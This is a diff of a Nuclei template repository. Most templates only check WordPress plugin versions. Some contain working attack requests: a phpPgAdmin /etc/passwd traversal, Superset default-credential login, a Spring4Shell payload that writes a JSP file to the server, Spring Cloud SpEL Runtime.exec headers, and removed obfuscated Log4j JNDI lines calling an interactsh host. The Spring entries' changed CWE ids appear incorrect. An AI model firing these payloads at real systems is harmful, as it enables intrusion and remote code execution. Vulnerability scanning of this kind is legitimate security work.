+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-product-feed-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.8.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069.yaml b/poc/cve/CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069.yaml
new file mode 100644
index 0000000000..5c5a9860fc
--- /dev/null
+++ b/poc/cve/CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069
+
+info:
+ name: >
+ WooCommerce Google Feed Manager <= 2.8.0 - Missing Authorization to Authenticated (Contributor+) Arbitrary Feed Actions
+ author: topscoder
+ severity: low
+ description: >
+ The WooCommerce Google Feed Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 2.8.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to perform various feed actions, such as deleting a feed, duplicating a feed, and changing the status of a feed.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6b8fac8f-619a-442e-8b8f-43a0c0a44b07?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-7258
+ metadata:
+ fofa-query: "wp-content/plugins/wp-product-feed-manager/"
+ google-query: inurl:"/wp-content/plugins/wp-product-feed-manager/"
+ shodan-query: 'vuln:CVE-2024-7258'
+ tags: cve,wordpress,wp-plugin,wp-product-feed-manager,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-product-feed-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-product-feed-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.8.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7384.yaml b/poc/cve/CVE-2024-7384.yaml
new file mode 100644
index 0000000000..95f98b1286
--- /dev/null
+++ b/poc/cve/CVE-2024-7384.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7384
+
+info:
+ name: >
+ AcyMailing <= 9.7.2 - Authenticated (Subscriber+) Arbitrary File Upload via acym_extractArchive Function
+ author: topscoder
+ severity: low
+ description: >
+ The AcyMailing – An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the acym_extractArchive function in all versions up to, and including, 9.7.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0c747bc9-582c-4b9f-85a4-469c446d50f5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.5
+ cve-id: CVE-2024-7384
+ metadata:
+ fofa-query: "wp-content/plugins/acymailing/"
+ google-query: inurl:"/wp-content/plugins/acymailing/"
+ shodan-query: 'vuln:CVE-2024-7384'
+ tags: cve,wordpress,wp-plugin,acymailing,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/acymailing/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "acymailing"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 9.7.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7559-0036d3af189dfdcdecf071d33e7a3e17.yaml b/poc/cve/CVE-2024-7559-0036d3af189dfdcdecf071d33e7a3e17.yaml
new file mode 100644
index 0000000000..2bb090c2c6
--- /dev/null
+++ b/poc/cve/CVE-2024-7559-0036d3af189dfdcdecf071d33e7a3e17.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7559-0036d3af189dfdcdecf071d33e7a3e17
+
+info:
+ name: >
+ File Manager Pro <= 8.3.7 - Authenticated (Subscriber+) Arbitrary File Upload
+ author: topscoder
+ severity: low
+ description: >
+ The File Manager Pro plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation and capability checks in the mk_file_folder_manager AJAX action in all versions up to, and including, 8.3.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f4b45791-4b85-4a2d-8019-1d438bd694cb?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-7559
+ metadata:
+ fofa-query: "wp-content/plugins/wp-file-manager-pro/"
+ google-query: inurl:"/wp-content/plugins/wp-file-manager-pro/"
+ shodan-query: 'vuln:CVE-2024-7559'
+ tags: cve,wordpress,wp-plugin,wp-file-manager-pro,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-file-manager-pro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-file-manager-pro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 8.3.7')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7778.yaml b/poc/cve/CVE-2024-7778.yaml
new file mode 100644
index 0000000000..eaf0662ec8
--- /dev/null
+++ b/poc/cve/CVE-2024-7778.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7778
+
+info:
+ name: >
+ Orbit Fox by ThemeIsle <= 2.10.36 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload
+ author: topscoder
+ severity: low
+ description: >
+ The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.10.36 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/be83c6be-fb6c-462f-b54a-ca12d6d2581f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-7778
+ metadata:
+ fofa-query: "wp-content/plugins/themeisle-companion/"
+ google-query: inurl:"/wp-content/plugins/themeisle-companion/"
+ shodan-query: 'vuln:CVE-2024-7778'
+ tags: cve,wordpress,wp-plugin,themeisle-companion,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/themeisle-companion/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "themeisle-companion"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.10.36')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7836.yaml b/poc/cve/CVE-2024-7836.yaml
new file mode 100644
index 0000000000..9141adda71
--- /dev/null
+++ b/poc/cve/CVE-2024-7836.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7836
+
+info:
+ name: >
+ Themify Builder <= 7.6.1 - Missing Authorization to Authenticated (Contributor+) Post Duplication
+ author: topscoder
+ severity: low
+ description: >
+ The Themify Builder plugin for WordPress is vulnerable to unauthorized post duplication due to missing checks on the duplicate_page_ajaxify function in all versions up to, and including, 7.6.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to duplicate and view private or draft posts created by other users that otherwise shouldn't be accessible to them.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/31dfc46c-a673-41f1-b701-aa832f004ebc?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-7836
+ metadata:
+ fofa-query: "wp-content/plugins/themify-builder/"
+ google-query: inurl:"/wp-content/plugins/themify-builder/"
+ shodan-query: 'vuln:CVE-2024-7836'
+ tags: cve,wordpress,wp-plugin,themify-builder,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/themify-builder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "themify-builder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 7.6.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7848.yaml b/poc/cve/CVE-2024-7848.yaml
new file mode 100644
index 0000000000..9fc302a80c
--- /dev/null
+++ b/poc/cve/CVE-2024-7848.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7848
+
+info:
+ name: >
+ User Private Files <= 2.1.0 - Insecure Direct Object Reference to Authenticated (Subscriber+) Private File Access
+ author: topscoder
+ severity: low
+ description: >
+ The User Private Files – WordPress File Sharing Plugin plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.1.0 via the 'dpk_upvf_update_doc' due to missing validation on the 'docid' user controlled key. This makes it possible for authenticated attackers, with subscriber-level access and above, to gain access to other user's private files.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0fb06de8-97d6-46c3-83ef-93a209540259?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-7848
+ metadata:
+ fofa-query: "wp-content/plugins/user-private-files/"
+ google-query: inurl:"/wp-content/plugins/user-private-files/"
+ shodan-query: 'vuln:CVE-2024-7848'
+ tags: cve,wordpress,wp-plugin,user-private-files,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/user-private-files/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "user-private-files"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.0')
\ No newline at end of file
diff --git a/poc/cve/cve-2008-5587.yaml b/poc/cve/cve-2008-5587.yaml
index e714f96cca..fda684a006 100644
--- a/poc/cve/cve-2008-5587.yaml
+++ b/poc/cve/cve-2008-5587.yaml
@@ -1,27 +1,28 @@
id: CVE-2008-5587
-
info:
name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion
author: dhiyaneshDK
severity: medium
- reference: https://www.exploit-db.com/exploits/7363
-
+ description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/7363
+ - http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/
+ - http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014
+ - http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263
+ classification:
+ cve-id: CVE-2008-5587
metadata:
- shodan-query: 'http.title:"phpPgAdmin"'
- description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php."
-
+ shodan-query: http.title:"phpPgAdmin"
+ tags: cve,cve2008,lfi,phppgadmin
requests:
- method: GET
path:
- '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00'
-
matchers-condition: and
matchers:
-
- type: regex
regex:
- "root:[x*]:0:0"
-
- type: status
status:
- 200
diff --git a/poc/cve/cve-2016-6210.yaml b/poc/cve/cve-2016-6210.yaml
index 0cf11fcf80..668fd715ec 100644
--- a/poc/cve/cve-2016-6210.yaml
+++ b/poc/cve/cve-2016-6210.yaml
@@ -1,9 +1,10 @@
id: CVE-2016-6210
+
info:
name: OpenSSH username enumeration < v7.3
author: iamthefrogy,forgedhallpass
severity: medium
- tags: cve,cve2016,network,openssh
+
description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities.
reference:
- http://seclists.org/fulldisclosure/2016/Jul/51
@@ -15,15 +16,18 @@ info:
cvss-score: 5.9
cve-id: CVE-2016-6210
cwe-id: CWE-200
+
network:
- host:
- "{{Hostname}}"
- "{{Host}}:22"
+
matchers:
- type: regex
regex:
- '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)'
+
extractors:
- type: regex
regex:
- - '(?i)SSH-2.0-OpenSSH_[^\r\n]+'
+ - '(?i)SSH-2.0-OpenSSH_[^\r\n]+'
\ No newline at end of file
diff --git a/poc/cve/cve-2018-15473.yaml b/poc/cve/cve-2018-15473.yaml
index 2392e8714b..e2eabe600d 100644
--- a/poc/cve/cve-2018-15473.yaml
+++ b/poc/cve/cve-2018-15473.yaml
@@ -1,28 +1,28 @@
id: CVE-2018-15473
+
info:
name: OpenSSH Username Enumeration <= v7.7
author: r3dg33k,daffainfo,forgedhallpass
severity: medium
description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2018-15473
- - https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0
- - https://bugs.debian.org/906236
- - http://www.openwall.com/lists/oss-security/2018/08/15/5
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
- cvss-score: 5.3
+ cvss-score: 5.30
cve-id: CVE-2018-15473
cwe-id: CWE-362
- tags: network,openssh,cve,cve2018
+
+
network:
- host:
- "{{Hostname}}"
- "{{Host}}:22"
+
matchers:
- type: regex
regex:
- '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)'
+
extractors:
- type: regex
regex:
diff --git a/poc/cve/cve-2021-44451.yaml b/poc/cve/cve-2021-44451.yaml
index bc69c3ca6e..71a197e9fd 100644
--- a/poc/cve/cve-2021-44451.yaml
+++ b/poc/cve/cve-2021-44451.yaml
@@ -1,5 +1,4 @@
id: CVE-2021-44451
-
info:
name: Apache Superset Default Login
author: dhiyaneshDK
@@ -12,14 +11,12 @@ info:
tags: apache, default-login
classification:
cve-id: CVE-2021-44451
-
requests:
- raw:
- |
GET /login/ HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
-
- |
POST /login/ HTTP/1.1
Host: {{Hostname}}
@@ -28,14 +25,12 @@ requests:
Referer: {{BaseURL}}/admin/airflow/login
csrf_token={{csrf_token}}&username={{username}}&password={{password}}
-
attack: pitchfork
payloads:
username:
- admin
password:
- admin
-
extractors:
- type: regex
name: csrf_token
@@ -44,7 +39,6 @@ requests:
internal: true
regex:
- 'value="(.*?)">'
-
matchers-condition: and
matchers:
- type: word
@@ -54,12 +48,10 @@ requests:
- 'Redirecting...'
- 'Redirecting...'
-
- type: word
part: header
words:
- 'session'
-
- type: status
status:
- 302
diff --git a/poc/cve/cve-2022-22965.yaml b/poc/cve/cve-2022-22965.yaml
index 84009f6f85..e6922c3d24 100644
--- a/poc/cve/cve-2022-22965.yaml
+++ b/poc/cve/cve-2022-22965.yaml
@@ -1,51 +1,36 @@
id: CVE-2022-22965
info:
- name: Spring Framework - Remote Code Execution
- author: justmumu,arall,dhiyaneshDK,akincibor
+ name: CVE-2022-22965 - Spring4Shell RCE Vulnerability
+ author: justmumu
+ description: CVE-2022-22965 - Spring Core Remote Code Execution Vulnerability
severity: critical
- description: A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.
- reference:
- - https://tanzu.vmware.com/security/cve-2022-22965
- - https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/
- - https://twitter.com/RandoriAttack/status/1509298490106593283
- - https://mp.weixin.qq.com/s/kgw-O4Hsd9r2vfme3Y2Ynw
- - https://twitter.com/_0xf4n9x_/status/1509935429365100546
- - https://nvd.nist.gov/vuln/detail/cve-2022-22965
- remediation: 5.3.x users should upgrade to 5.3.18+, 5.2.x users should upgrade to 5.2.20+.
+ tags: cve,rce,spring,cve2022,injection
classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2022-22965
- cwe-id: CWE-94
- tags: cve,cve2022,rce,spring,injection,oast,intrusive
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-22965
+ cwe-id: CWE-770
requests:
- - method: GET
- path:
- - "{{BaseURL}}/?class.module.classLoader.resources.context.configFile=https://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx"
-
- method: POST
path:
- "{{BaseURL}}"
-
+ redirects: false
headers:
+ suffix: "%>"
+ c2: "<%"
Content-Type: application/x-www-form-urlencoded
+ body: class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(%22j%22))%7B%20out.println(new%20String(%22Falcon%20Punch!%22))%3B%20%7D%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=AAAAAAAAAAAAAAA&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
- body: |
- class.module.classLoader.resources.context.configFile=https://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx
+ - method: GET
+ path:
+ - "{{RootURL}}/AAAAAAAAAAAAAAA.jsp"
+ headers:
+ 01: "{{wait_for(5)}}"
- matchers-condition: and
matchers:
- - type: word
- part: interactsh_protocol # Confirms the HTTP Interaction
- words:
- - "http"
-
- - type: word
- part: interactsh_request
- words:
- - "User-Agent: Java"
- case-insensitive: true
-
-# Enhanced by mp on 2022/05/19
+ - type: dsl
+ dsl:
+ - "status_code==200 && contains(body, 'Falcon Punch!')"
+
\ No newline at end of file
diff --git a/poc/cve/springForShell-CVE-2022-22963.yaml b/poc/cve/springForShell-CVE-2022-22963.yaml
index d04177443d..f28360d6a7 100644
--- a/poc/cve/springForShell-CVE-2022-22963.yaml
+++ b/poc/cve/springForShell-CVE-2022-22963.yaml
@@ -1,46 +1,44 @@
id: CVE-2022-22963
info:
- name: Spring Cloud - Remote Code Execution
- author: Mr-xn,Adam Crosser
+ name: CVE-2022-22963 - Spring Cloud RCE
+ author: rdnt
severity: critical
- description: |
- Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.
- reference:
- - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f
- - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE
- - https://tanzu.vmware.com/security/cve-2022-22963
- - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/
- - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection
- - https://nvd.nist.gov/vuln/detail/CVE-2022-22963
+ description: RCE on Spring cloud function SPEL
+ tags: cve,rce,spring,cve2022,injection
classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2022-22963
- cwe-id: CWE-94
- tags: cve,cve2022,springcloud,rce
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-22963
+ cwe-id: CWE-770
requests:
- - raw:
- - |
- POST /functionRouter HTTP/1.1
- Host: {{Hostname}}
- spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}")
- Content-Type: application/x-www-form-urlencoded
-
- {{rand_base(8)}}
+ - method: POST
+ path:
+ - "{{RootURL}}/functionRouter"
+ - "{{RootURL}}/api/functionRouter"
+ - "{{RootURL}}/api/v1/functionRouter"
+ - "{{RootURL}}/../../../../../../functionRouter"
+ - "{{RootURL}}/../../../../../../;functionRouter"
+ - "{{RootURL}}/spring/functionRouter"
+ - "{{RootURL}}/admin/functionRouter"
+ - "{{RootURL}}/../../../../../../../../functionRouter"
+ - "{{RootURL}}../../../../../../../../api/functionRouter"
+ - "{{RootURL}}../../../../../../../../api/v1/functionRouter"
+ - "{{RootURL}}%2f%2e%2e%2f%2e%2e%2ffunctionRouter"
+ - "{{RootURL}}%2fspring%2ffunctionRouter"
+ - "{{RootURL}}%2fadmin%2functionRouter"
+ headers:
+ spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("")
+ Content-Type: application/x-www-form-urlencoded
+ body: exp
matchers-condition: and
matchers:
- - type: word
- part: interactsh_protocol
- words:
- - "http"
- - "dns"
- condition: or
-
- - type: status
- status:
- - 500
-
-# Enhanced by mp on 2022/05/19
+ - type: word
+ part: body
+ words:
+ - 'functionRouter'
+ - type: status
+ status:
+ - 500
\ No newline at end of file
diff --git a/poc/fuzz/log4j-fuzz2.yaml b/poc/fuzz/log4j-fuzz2.yaml
index 70414c34c9..a633a9bdb1 100644
--- a/poc/fuzz/log4j-fuzz2.yaml
+++ b/poc/fuzz/log4j-fuzz2.yaml
@@ -12,6 +12,7 @@ http:
GET / HTTP/1.1
Host: {{Hostname}}
{{log4j_payloads}}
+
- |
POST / HTTP/1.1
Host: {{Hostname}}
@@ -37,169 +38,6 @@ http:
- 'X-Wap-Profile: ${jndi:ldap://{{interactsh-url}}/info}'
- 'X-Api-Version: ${jndi:ldap://{{interactsh-url}}/info}'
- 'Host: ${jndi:ldap://{{interactsh-url}}/info}'
- - 'X-Client-IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
- - 'X-Client-IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
- - 'X-Client-IP: ${jndi:rmi://{{interactsh-url}}}'
- - 'X-Client-IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Client-IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Client-IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Client-IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
- - 'X-Remote-IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
- - 'X-Remote-IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
- - 'X-Remote-IP: ${jndi:rmi://{{interactsh-url}}}'
- - 'X-Remote-IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Remote-IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Remote-IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Remote-IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
- - 'X-Remote-Addr: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
- - 'X-Remote-Addr: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
- - 'X-Remote-Addr: ${jndi:rmi://{{interactsh-url}}}'
- - 'X-Remote-Addr: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Remote-Addr: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Remote-Addr: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Remote-Addr: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
- - 'X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
- - 'X-Forwarded-For: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
- - 'X-Forwarded-For: ${jndi:rmi://{{interactsh-url}}}'
- - 'X-Forwarded-For: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Forwarded-For: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Forwarded-For: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Forwarded-For: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
- - 'X-Originating-IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
- - 'X-Originating-IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
- - 'X-Originating-IP: ${jndi:rmi://{{interactsh-url}}}'
- - 'X-Originating-IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Originating-IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Originating-IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Originating-IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
- - 'User-Agent: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
- - 'User-Agent: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
- - 'User-Agent: ${jndi:rmi://{{interactsh-url}}}'
- - 'User-Agent: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'User-Agent: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'User-Agent: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'User-Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
- - 'Referer: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
- - 'Referer: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
